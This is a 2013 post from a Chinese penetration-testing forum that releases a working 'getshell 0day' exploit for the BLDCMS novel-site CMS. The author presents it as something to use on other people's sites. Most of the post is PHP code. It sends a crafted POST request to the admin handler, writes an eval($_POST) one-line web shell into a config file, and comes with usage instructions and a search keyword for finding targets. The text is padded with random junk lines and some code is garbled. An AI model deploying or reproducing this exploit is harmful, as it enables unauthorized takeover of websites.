中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
* o( I( P0 t+ T. X1 _- \# P6 c( f
) O+ a$ x$ U0 Z% E
; F$ m8 Q; [* v6 m! o8 Y6 r) S% a
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
: u8 P; M/ N& \* c
) ?; G9 ?% @$ z2 L% G5 w4 `- h
既然都有人发了 我就把我之前写好的EXP放出来吧
8 J+ y2 l/ f6 x0 E4 i0 y3 w' a% D% v4 G
4 [) n; w4 _% Y4 n
view source print?01.php;">
9 F1 w- M4 c6 M, a: L1 S
02.<!--?php
: i ^* R5 q* i5 s+ r. |
03.echo "-------------------------------------------------------------------
8 R* l5 f" f4 E3 _
04.
: P8 l6 `; q3 X+ d$ {0 ?4 n+ o; ~
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
5 g% Q$ c! h1 W3 t, o
06.
2 I' @4 R1 U' z
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
1 S' s# X! K2 f" W
08.
- O, C% p V+ r( U9 {8 e
09.QQ:981009941\r\n 2013.3.21\r\n
6 \5 U, w9 v9 f' w" s
10.
& X: }% ?4 H/ D1 f* Z9 Y
11.
6 |8 E0 w2 r% g$ k/ ~
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
4 H$ W% I! O% |# D" l; k
13.
[: i; A+ P! I
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
7 u9 R! e1 a7 M+ K9 S- D
15.
4 }$ J9 T' x4 h& K6 {) |2 T
16.--------------------------------------------------------------------\r\n";
% S4 _, R& D4 H% }
17.$url=$argv[1];
% S9 y/ V& G% M7 I
18.$dir=$argv[2];
% m5 j$ e" f9 H, A. C0 ^# Q5 ~
19.$pass=$argv[3];
- M; O4 {. ?8 T9 B8 h6 r) [
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; w. ^& e" m! F
21.if (emptyempty($pass)||emptyempty($url))
{1 ~. \( `) L0 T# x7 {
22.{exit("请输入参数");}
% |7 @2 r3 `; K. ^2 J) m5 |' P
23.else
% ?$ |" D0 \& z; @
24.{
, u+ m+ T( T" h# p: ?
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
, \9 o. s$ {4 a# ]$ {
26.
: S" Z# q, d; b+ c1 U1 d
27.al;
[1 |. C* R& J/ {
28.$length = strlen($fuckdata);
$ ^- d# E) D2 \) j2 H- p
29.function getshell($url,$pass)
2 @/ F2 h T6 p7 X; d6 c9 y/ p
30.{
" f' }: n' J! {$ i
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
3 @; T) E" H0 e
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
; e0 B6 s; x' l) T( f4 {2 e
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
4 ?* h- [5 @. ]% J& j7 C
34.$header .= "User-Agent: MSIE\r\n";
$ Z& X" k" Y, i, G
35.$header .= "Host:".$url."\r\n";
0 e2 T6 B+ M0 e% H; u( I
36.$header .= "Content-Length: ".$length."\r\n";
) N2 k2 g$ M( R' Q4 @5 l# l
37.$header .= "Connection: Close\r\n";
9 N s: w1 i( v1 a8 A
38.$header .="\r\n";
3 f7 H A7 Q# {6 e. p( Z5 j# E9 R
39.$header .= $fuckdata."\r\n\r\n";
7 @% Q0 Y8 K2 {9 C; [1 x
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
( Z6 s4 R/ Y0 {& ?. j
41.if (!$fp)
, {* l# ~8 x7 R+ n Q6 Q
42.{
% L2 X6 Z2 g. }% @& Z; i A
43.exit ("利用失败:请检查指定目标是否能正常打开");
9 d0 t: g6 o# S( p: W& C+ h# e
44.}
* W$ z/ E2 G+ U
45.else{ if (!fputs($fp,$header))
2 Y# e! E/ ~' s: \: z7 b
46.{exit ("利用失败");}
2 h/ A5 H: N- K* ?$ n! k4 K
47.else
! B; Z/ F( u4 ^' Q! s! j
48.{
( f" T- F. L, c$ a) `) ^0 W) b) n
49.$receive = '';
* Y M) u/ t; v
50.while (!feof($fp)) {
' @5 F" h3 K4 L1 Z( y9 v
51.$receive .= @fgets($fp, 1000);
* R* ]3 D( d. c, b: y! c1 [
52.}
# F) k2 a1 H$ h& K4 [) q9 Y
53.@fclose($fp);
5 [& |( k% N$ m& y z
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
2 A, X5 Q, P- C! D( e
55.
0 n! q( j/ k, B" l5 ]
56.GPC是否=off)";
H3 Y+ e: Z. Y+ J+ X2 H2 v
57.}}
+ A. P' W! d1 e" a/ L& Z' r6 T* E
58.}
% s. @ F6 n9 h2 @# x) z" a M
59.}
) t4 U4 I5 U) A6 ^. ?
60.getshell($url,$pass);
2 w5 B7 m2 |# I0 e6 A4 i2 `
61.?-->
; P1 _( `% ?+ r4 I
0 r k, j* N+ b+ ~+ j; G
# b* X! H2 @/ w2 Z/ o
* f; z) ]$ \" h5 W' U+ n( x
by 数据流
3 T. @) r0 B+ ?8 Q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2